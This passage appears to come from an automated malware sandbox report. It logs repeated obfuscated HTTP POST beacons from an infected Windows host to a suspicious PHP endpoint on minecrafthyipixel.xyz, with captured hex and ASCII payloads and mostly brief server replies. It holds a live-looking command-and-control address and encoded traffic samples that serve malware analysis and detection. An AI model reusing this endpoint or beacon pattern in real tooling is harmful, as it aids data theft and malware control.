                                                                                                                                    Apr 19, 2024 13:44:15.418864965 CEST2512OUTData Raw: 57 59 5e 54 5c 40 54 5a 5c 5e 59 59 57 54 58 53 54 53 5f 56 54 5f 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^T\@TZ\^YYWTXSTS_VT_S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X>T"8$\'3$'81U>820S%+P4!5*/\#<_/%$[. X )
                                                                                                                                    Apr 19, 2024 13:44:15.775984049 CEST629INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rU%2BzM%2FA%2FQhHc7LmKke3cGrN9RatJqGiA%2FXYeN%2B35KOHeBjHZqUJ28rR5cK2VaKkJu7d3YebqUph44MbV51iFZ2HO5nO%2F21V3vEMuhR1QGq%2FxRnlaatixR61cS%2FpXlDXTvdduiaW1LLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4400a9953b9-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:15.776045084 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    158192.168.2.449912104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:15.996684074 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:16.101279974 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:16.101396084 CEST2512OUTData Raw: 52 5a 5e 5f 5c 40 54 5a 5c 5e 59 59 57 53 58 52 54 5a 5f 5a 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^_\@TZ\^YYWSXRTZ_ZT_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%12T6(X3 00;)+19R1+.P72)+'4?<-5$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:16.358812094 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgFWMjw39U%2BvrBO2yYP7Diw%2FdotlLYV5WdS7t4%2Fn%2FlEt%2Fg4zRK2RIj2DqCTod57UISB1eFQCk9jbDS7Z%2FYkvFCUz5IE25ZO3aFwPh55zowYdsOnG8HopbzRVBTXVeqeqPaBZ22s4jxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4445cf47ba2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:16.358875990 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    159192.168.2.449913104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:16.576459885 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:16.680862904 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:16.680963993 CEST2512OUTData Raw: 52 5d 5e 5b 59 4a 54 5f 5c 5e 59 59 57 56 58 5a 54 56 5f 5b 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[YJT_\^YYWVXZTV_[T_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_1X*W6$]$ ?3-W=8<&),%;"72&V)]$ ;.$[. X !
                                                                                                                                    Apr 19, 2024 13:44:16.965631962 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yXVyF4jAfRdNVW4QuqrYnfcw52EtMnrgumoL7ziCzC9RM8D5x9EK4rJ8RPB86OTrVquZEDwGtEa239NuUDgPz%2BFN3sQZsE%2F2xJVnx1vHPVSQcR6ClyGBxywkOWQ8dbAHQFcj69xdIy0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca447fb358831-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:16.965692997 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    160192.168.2.449914104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:17.185497999 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:17.290391922 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:17.290540934 CEST2512OUTData Raw: 52 59 5e 5a 59 44 51 5d 5c 5e 59 59 57 53 58 52 54 56 5f 57 54 5c 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^ZYDQ]\^YYWSXRTV_WT\SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>&U ;\07\%8.*#Y2 $;>#"T=8<"<(:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:17.641258001 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2Fs5AS5apuhHbR9%2FEmzuo1qPxIWQ8ZvP6vNg9eW84bbgoQxdbk4cfB49ZEG3%2FkNasEmgOht9J%2B8Iookd6FiAO799sn9NtysJVkPPiinlbMc%2F0CIleOoRHLd%2BSZM64RcFtb8ght3nh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca44bb8387bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:17.641321898 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    161192.168.2.449915104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:17.871247053 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:17.976428032 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:17.976902008 CEST2512OUTData Raw: 52 5e 5e 58 59 41 54 5e 5c 5e 59 59 57 55 58 5d 54 50 5f 56 54 5b 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^XYAT^\^YYWUX]TP_VT[S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>5 +Y3']0+>8& R%]" "P*;;\"? [9$[. X -
                                                                                                                                    Apr 19, 2024 13:44:18.337733030 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r37DrnFjd5z39dZCZGGroka3nIe0t7gHDcBM49FKY2aNVozWdN2qSr7uyqJdLsCq%2FJR%2B55G1W2Xhg4jbXNJndgVqkpbOMUH1QcvizGsxaKv3tGdfL%2FGnLzhUt%2Btj87EpYBR7e2GsVjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4500bd46758-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:18.337794065 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    162192.168.2.449916104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:18.410880089 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:18.515522957 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:18.515650034 CEST2192OUTData Raw: 52 5a 5e 5f 59 44 51 5e 5c 5e 59 59 57 50 58 53 54 5a 5f 5d 54 5e 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^_YDQ^\^YYWPXSTZ_]T^S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'>5;407\3-)^<1$+& "2W=#/$[/5$[. X
                                                                                                                                    Apr 19, 2024 13:44:18.774802923 CEST770INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGa5ySIL%2Fkm9YbjCw0UgftcghJi3S%2BBYObvwJGzxEX5%2FAyL5hFMS3o5DjIpPtEKdj6PvFCLFWZ8t6EsMIuwicrtmHoOK%2FlCx2PwMyo7Hi7EvnaGcaPwoG8GNKHRwVLAKgaeTCpRKx2g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4536a5c6734-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5f 24 08 0c 1b 36 04 09 5b 2a 20 32 5b 3e 37 29 5f 29 00 31 14 20 2e 24 55 2c 5c 3f 04 3f 05 04 18 26 30 32 08 24 3d 33 0a 26 1a 21 59 00 1a 39 5f 37 3c 2d 5b 3a 39 31 59 28 0f 2e 07 34 22 28 02 3c 3e 2e 0d 21 38 38 05 3c 10 2e 0e 38 06 38 52 3f 06 39 18 3b 34 2d 01 22 2b 2c 52 09 12 26 09 3c 01 28 5e 25 20 2d 1d 20 0f 09 04 3c 3f 26 10 27 38 3c 1d 31 23 3b 02 2e 0c 00 12 25 3e 36 0d 2a 14 33 0a 20 12 21 52 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$_$6[* 2[>7)_)1 .$U,\??&02$=3&!Y9_7<-[:91Y(.4"(<>.!88<.88R?9;4-"+,R&<(^% - <?&'8<1#;.%>6*3 !R&.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:18.774863005 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    163192.168.2.449917104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:18.529369116 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:18.634421110 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:18.634707928 CEST2512OUTData Raw: 52 5f 5e 5b 59 46 51 5d 5c 5e 59 59 57 54 58 5c 54 54 5f 5d 54 5a 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^[YFQ]\^YYWTX\TT_]TZSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1> ;$X$07';2?++&) S2]. 1)++4?$].$[. X )
                                                                                                                                    Apr 19, 2024 13:44:19.006458044 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMoh1Xo9zZkBfAu%2FJvTXBdMfri4a6iVL%2BOAnrVVZr99DrgTB%2F%2Fxyborj5ADX%2F1No841nC%2Fc3JSZYe30YBRSEqDh6MXTIxHR54712IqGtBRSdWznv%2B4g1TmmW5q56dSioD7UqPKE1P7o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4542ad97bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:19.006521940 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    164192.168.2.449918104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:19.233179092 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:19.338112116 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:19.338382959 CEST2512OUTData Raw: 52 5f 5b 58 5c 40 54 5a 5c 5e 59 59 57 51 58 59 54 53 5f 57 54 5d 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_[X\@TZ\^YYWQXYTS_WT]S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>6S5#$#8%;?(&)28!72"P);]"/<-$[. X =
                                                                                                                                    Apr 19, 2024 13:44:19.693661928 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:19 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq7BywHMZyWhQ6V%2BDBhjS0Z7OpBK%2B44%2BCjJdbohsh6BQLL8qfYRWI5uK2U0RF2QSLv5c%2FpL09wMDRH9VsuMKKoJ4myb1jtFPHtsOs2wNFPRgUs5P2tZwEqvRpoy0hVjb4SeYeZ0MIeQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca45888d27bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:19.694112062 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    165192.168.2.449919104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:19.921874046 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:20.026436090 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:20.026846886 CEST2512OUTData Raw: 57 5f 5e 5c 59 4b 54 5e 5c 5e 59 59 57 52 58 5e 54 52 5f 56 54 5a 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^\YKT^\^YYWRX^TR_VTZSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z%.5;/'V8%;6*+?^& 1"4>Q*8;Z"<':%$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:20.383475065 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2F0H7JSsOlz1Jr5fQ5YtYtwcutqxJ3l1xFOk7qCV%2FQ%2FKYtqmhWeXl1GlU8onzCc09%2BkGJU2Gor92%2Fk7MojUK7quhiAjE%2FOfO5SHzuAqhBGDB9zXh62oqJkUI9qzsxXdhJ6gKmT1N0hI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca45cdf5d8bb7-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:20.383547068 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    166192.168.2.449920104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:20.616400003 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:20.720829964 CEST25INHTTP/1.1 100 Continue
